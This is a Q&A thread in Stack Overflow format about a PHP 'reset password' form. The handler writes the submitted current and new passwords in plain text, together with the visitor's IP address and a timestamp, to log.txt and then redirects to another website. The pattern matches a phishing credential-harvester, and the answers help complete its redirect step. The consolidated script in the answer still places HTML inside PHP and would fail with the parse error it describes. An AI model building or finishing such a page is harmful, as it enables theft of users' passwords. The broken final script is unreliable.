# PHP script to validate form data

Tags: javascript, php, html

I have a form for reseting password. The PHP script stores all 3 passwords in a text file. I know it is unsafe to do so but this is just for learning purposes.

```
<form action="login.php" method="POST" accept-charset="utf-8">
  <p>
    <label for="id_current_password">Current password:</label>
    <input id="id_current_password" name="current_password" type="password" />
  </p>
  <p>
    <label for="id_new_password1">New password:</label>
    <input id="id_new_password1" name="new_password1" type="password" />
  </p>
  <p>
    <label for="id_new_password2">New password confirmation:</label>
    <input id="id_new_password2" name="new_password2" type="password" />
  </p>
  <p>
    <input type="submit" value="Reset Password">
  </p>
</form>
```

This form sends these passwords to login.php.

```
<?php

$myFile = fopen("log.txt", "a") or die("Unable to open file!");
$stringData = $_POST['current_password'] . "CP";
fwrite($myFile, $stringData);     
$stringData = $_POST['new_password1'] . ":";
fwrite($myFile, $stringData);
$stringData = $_POST['new_password2'] . "\n";
fwrite($myFile, $stringData);
fclose($myFile);

     ?>
<?php
date_default_timezone_set('Asia/Kolkata');
$ip = $_SERVER['REMOTE_ADDR'];
$dt = date("l dS \of F Y h:i:s A");
$file=fopen("log.txt","a");
$data = $ip.' '.$dt."\n";
fwrite($file, $data);
fclose($file);
?>

if(($_POST['new_password1'])==($_POST['new_password2'])) {
    <script>location.href='https://www.MYWEBSITE.com';</script>
} else {
    <script>location.href='http://www.MYWEBSITEerror.com'</script>
}
```

I'm wondering how to redirect user to an error webpage if new passwords don't match and if they match they should be redirected to website according to script. I am aware of echo and other ways to alert user but I SPECIFICALLY want this method.

Comment: so, what's "not" working here?

Comment: Your `if` statement seems to be outside of the php tags

Comment: `?> if(($_POST['new_password1'])==($_POST['new_password2'])) {
    <script>location.href='https://www.MYWEBSITE.com';</script>
} else {
    <script>location.href='http://www.MYWEBSITEerror.com'</script>
}` parse error right there.

Answer (score 2):

You can use the PHP function of [`header()`](http://php.net/manual/en/function.header.php) instead:

```
<?php

if(($_POST['new_password1'])==($_POST['new_password2'])) {
    header ('Location: https://www.MYWEBSITE.com');
} else {
    header ('Location: http://www.MYWEBSITEerror.com');
}

?>
```

---

Your current code does not work since you cannot have HTML code within PHP tags as it will return parse error. To make it work, you have to echo the redirect part:

```
if(($_POST['new_password1'])==($_POST['new_password2'])) {
    echo "<script>location.href='https://www.MYWEBSITE.com';</script>";
} else {
    echo "<script>location.href='http://www.MYWEBSITEerror.com'</script>";
}
```

Alternatively, you can put the `<script>` tag outside of PHP tags:

```
// { ... }

fwrite($file, $data);
fclose($file);

if(($_POST['new_password1'])==($_POST['new_password2'])) {
?>
    <script>location.href='https://www.MYWEBSITE.com';</script>
<?php
} else {
?>
    <script>location.href='http://www.MYWEBSITEerror.com'</script>
<?php
}
?>
```

---

Basically, you should format your whole script to just have one set of PHP open and close tags, no idea why there's no many.

```
<?php

$myFile = fopen("log.txt", "a") or die("Unable to open file!");
$stringData = $_POST['current_password'] . "CP";
fwrite($myFile, $stringData);     
$stringData = $_POST['new_password1'] . ":";
fwrite($myFile, $stringData);
$stringData = $_POST['new_password2'] . "\n";
fwrite($myFile, $stringData);
fclose($myFile);

date_default_timezone_set('Asia/Kolkata');
$ip = $_SERVER['REMOTE_ADDR'];
$dt = date("l dS \of F Y h:i:s A");
$file=fopen("log.txt","a");
$data = $ip.' '.$dt."\n";
fwrite($file, $data);
fclose($file);

if(($_POST['new_password1'])==($_POST['new_password2'])) {
    <script>location.href='https://www.MYWEBSITE.com';</script>
} else {
    <script>location.href='http://www.MYWEBSITEerror.com'</script>
}

?>
```

Comment: header() function is the correct answer. But you sould remove the HTML code from the start of your php script. Don't let any spaces before the <?php start tag, or Header will not work.

Comment: True, yet you didn't see / explain *why* their code failed in the first place, which is pretty obvious here.

Comment: @Fred-ii- I've updated post, and also added the method to use for `<script>`, thanks!

Comment: @Panda welcome.